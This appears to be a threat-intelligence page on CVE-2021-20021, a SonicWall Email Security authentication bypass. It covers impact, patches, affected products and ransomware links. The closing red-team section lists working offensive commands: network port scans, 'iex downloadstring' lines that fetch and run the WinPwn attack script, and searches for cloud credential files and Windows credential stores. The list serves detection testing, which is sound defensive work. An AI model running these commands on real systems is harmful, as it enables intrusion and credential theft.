CVE-2021-20021
Overview
This vulnerability is an authentication bypass that enables unauthorized creation of administrative accounts. It arises from improper access control validation in the SonicWall Email Security management interface. The flaw affects the HTTP request handling component of SonicWall Email Security version 10.0.9.x, allowing attackers to execute privileged operations without authentication.
Vulnerability Description
A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
Impact
An attacker can remotely create administrative accounts without any authentication or user interaction, gaining full control over the SonicWall Email Security system. This enables unauthorized access to sensitive email security configurations and potential manipulation of email traffic filtering. The compromise can lead to complete system takeover, data exfiltration, and disruption of email security services, severely impacting organizational security posture.
Solution
SonicWall has released patches addressing this vulnerability for Email Security version 10.0.10 and later. Administrators should apply the updates as detailed in the SonicWall security notice at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007 and the product notification at https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360. It is critical to upgrade affected firmware on Email Security Appliances (models 3300, 4300, 8300, 9000) to the fixed versions to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical vulnerability exists within SonicWall Email Security version 10.0.9.x, which allows unauthorized users to create administrative accounts through specially crafted HTTP requests. This flaw arises from improper validation of input parameters, enabling attackers to bypass authentication mechanisms. By exploiting this weakness, an attacker can gain elevated privileges, potentially leading to full control over the email security appliance. The implications of this vulnerability are severe, as it undermines the core security features of the affected products, exposing sensitive information and compromising the integrity of email communications.
The attack vector for this vulnerability is primarily remote, as it requires only the ability to send HTTP requests to the affected devices. An attacker could exploit this vulnerability from anywhere on the internet, provided they can reach the target system. Scenarios for exploitation include crafting a malicious HTTP request that manipulates the parameters used during the account creation process. This could be done through automated scripts or tools designed to probe for weaknesses in web applications. Once the attacker successfully creates an administrative account, they can perform a range of malicious activities, such as intercepting emails, altering configurations, or deploying additional malware within the network.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on SonicWall Email Security appliances for protecting their email infrastructure. The potential for unauthorized access to sensitive communications can lead to data breaches, loss of customer trust, and regulatory repercussions. Furthermore, the ability to manipulate email security settings could enable attackers to launch phishing campaigns or distribute malware under the guise of legitimate communications. The business risks associated with such an incident are substantial, encompassing financial losses, reputational damage, and the costs associated with incident response and recovery.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the affected SonicWall products is crucial, as vendors typically release security updates to address known vulnerabilities. Additionally, monitoring network traffic for unusual patterns or unauthorized access attempts can help identify potential exploitation attempts. Organizations should also consider employing web application firewalls (WAFs) to filter and monitor HTTP requests, blocking those that exhibit suspicious characteristics. Furthermore, implementing strict access controls and regularly auditing user accounts can help minimize the risk of unauthorized account creation.
In conclusion, the vulnerability within SonicWall Email Security poses a serious threat to organizations that utilize these products for email protection. The ease of exploitation, combined with the potential for significant damage, underscores the importance of proactive security measures. By staying informed about vulnerabilities, applying timely patches, and employing robust detection and mitigation strategies, organizations can better safeguard their email systems against such critical threats.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-20021, signaling renewed adversary interest despite a slight decline in the EPSS score. This uptick in activity, coupled with the vulnerability’s inclusion in the Known Exploited Vulnerabilities catalog and its association with ransomware groups such as Sinobi, underscores an elevated operational risk for organizations running SonicWall Email Security 10.0.9.x. Although the EPSS score shows a modest decrease, the surge in telemetry from our sensors indicates that threat actors continue to actively probe and potentially weaponize this flaw. The presence of a publicly accessible proof-of-concept exploit, albeit limited in visibility, further lowers the barrier for exploitation. Collectively, these developments heighten the urgency for defenders to maintain vigilant monitoring and reinforce detection capabilities, as the threat landscape surrounding this critical vulnerability remains dynamic and potentially impactful.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Email Security | All |
cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 9000 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_9000_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 3300 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_3300_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 4300 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_4300_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 8300 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_8300_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 5000 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_5000_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 7000 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_7000_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 5050 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_5050_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 7050 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_7050_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Virtual Appliance | All |
cpe:2.3:a:sonicwall:email_security_virtual_appliance:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Hosted Email Security | All |
cpe:2.3:a:sonicwall:hosted_email_security:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
SUPRAAA-1337/CVE-2021-20021
|
SUPRAAA-1337 | 2 | 0 | 2023-09-07 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-20021 |
| psirt.global.sonicwall.com |
GitHub CVE
x_refsource_CONFIRM
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20021 |